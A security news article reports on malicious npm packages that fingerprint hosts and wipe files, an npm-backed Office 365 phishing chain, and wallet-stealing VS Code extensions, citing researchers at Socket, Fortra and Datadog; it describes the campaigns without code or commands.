Recent investigations have unveiled over 60 malicious npm packages lurking in the package registry, designed to extract sensitive information such as hostnames, IP addresses, DNS servers, and user directories, sending this data to a Discord-controlled endpoint. These packages were published under three distinct accounts and contain an install-time script that activates during the npm installation process, as reported by Socket security researcher Kirill Boychenko. Collectively, these libraries have seen downloads exceeding 3,000 times.
According to the software supply chain security firm, the scripts are capable of targeting systems running Windows, macOS, or Linux, incorporating basic checks to evade sandbox environments. This means that any infected workstation or continuous-integration node could become a source of valuable reconnaissance data.
Details on the Malicious Accounts
The three accounts responsible for these harmful packages, which published a total of 20 packages within an 11-day span, have since been removed from npm. The accounts, identified as bbbb335656, cdsfdfafd1232436437, and sdsds656565, were involved in distributing these malicious codes, which are specifically crafted to fingerprint devices upon installation. Furthermore, if the code detects it is operating in a virtualized environment associated with major cloud providers such as Amazon or Google, it halts execution.
Data Harvesting and Threat Implications
The information gathered includes critical details such as host specifications, DNS server configurations, network interface card (NIC) data, and both internal and external IP addresses, all of which are relayed to a Discord webhook. Boychenko noted that this data collection allows threat actors to map out networks and pinpoint high-value targets for future attacks.
This revelation coincides with the identification of another set of eight malicious npm packages that disguise themselves as helper libraries for popular JavaScript frameworks including React, Vue.js, Vite, and Node.js. Once installed, these packages deploy harmful payloads, having been downloaded over 6,200 times and still accessible in the repository.
Disguised Dangers in Popular Libraries
Socket security researcher Kush Pandya commented on the situation, indicating that these packages masquerade as legitimate tools while concealing destructive payloads meant to corrupt data, delete critical files, and crash systems. Some of these rogue packages are programmed to execute automatically when invoked in developers’ projects, leading to recursive deletions of files linked to Vue.js, React, and Vite. One particularly concerning package, js-bomb, extends its impact beyond just deleting files by triggering a system shutdown based on the execution time.
Investigations suggest that the threat actor known as xuxingfeng is behind these malicious publications, having also released five legitimate packages. This dual strategy of offering both harmful and non-harmful packages creates an illusion of trustworthiness, increasing the likelihood of users installing the malicious versions.
Phishing Campaigns and Advanced Techniques
Additionally, there has been a recent discovery of a sophisticated attack campaign that merges conventional email phishing tactics with JavaScript code embedded in a malicious npm package, camouflaged as a benign open-source library. According to Fortra researcher Israel Cerda, the attack begins with a phishing email that contains a malicious .HTM file, which holds encrypted JavaScript code linked to a now-removed npm package named citiycar8.
Once this package is installed, the embedded JavaScript initiates a URL redirection that ultimately leads users to a fraudulent Office 365 login page crafted to steal their credentials. Cerda highlighted that the attack showcases a high degree of sophistication, utilizing technologies such as AES encryption and npm packages delivered through a content delivery network (CDN), as well as multiple redirections to obscure malicious intents.
Growing Threat of Open-Source Repository Abuse
The exploitation of open-source repositories for malware distribution has become a common method for executing large-scale supply chain attacks. Recently, malicious data-stealing extensions were uncovered in Microsoft’s Visual Studio Code (VS Code) Marketplace, specifically targeting Solidity developers on Windows to extract cryptocurrency wallet credentials. Datadog Security Research attributes this activity to a threat actor known as MUT-9332.
The problematic extensions, named solaibot, among-eth, and blankebesxstnion, were presented as legitimate tools, hiding harmful code within functional features while utilizing command and control domains that seemed relevant to Solidity and would typically go unnoticed. These extensions employ intricate infection chains involving multiple layers of obfuscated malware, including one variant that hides its payload within an image file hosted on the Internet Archive.
Conclusion on Security Concerns and Future Implications
Although these extensions provided genuine features for Solidity developers, they were also engineered to deliver malicious payloads capable of stealing cryptocurrency wallet credentials from affected Windows systems. All three extensions have since been removed from the marketplace. The ultimate objective of these malicious VS Code extensions is to implant a harmful Chromium-based browser extension designed to extract Ethereum wallet information and transmit it to a command-and-control endpoint. Moreover, they can install an additional executable that disables Windows Defender, scans directories for Discord, Chromium browsers, cryptocurrency wallets, and Electron applications, and retrieves further payloads from remote servers.
Datadog researchers have also linked MUT-9332 to a recent campaign involving 10 malicious VS Code extensions intended to deploy an XMRig cryptominer while masquerading as coding or artificial intelligence tools. “This campaign highlights the lengths to which MUT-9332 will go to conceal malicious activities,” Datadog noted, suggesting that the detection and removal of this first wave of malicious extensions may lead to changes in tactics for future campaigns.
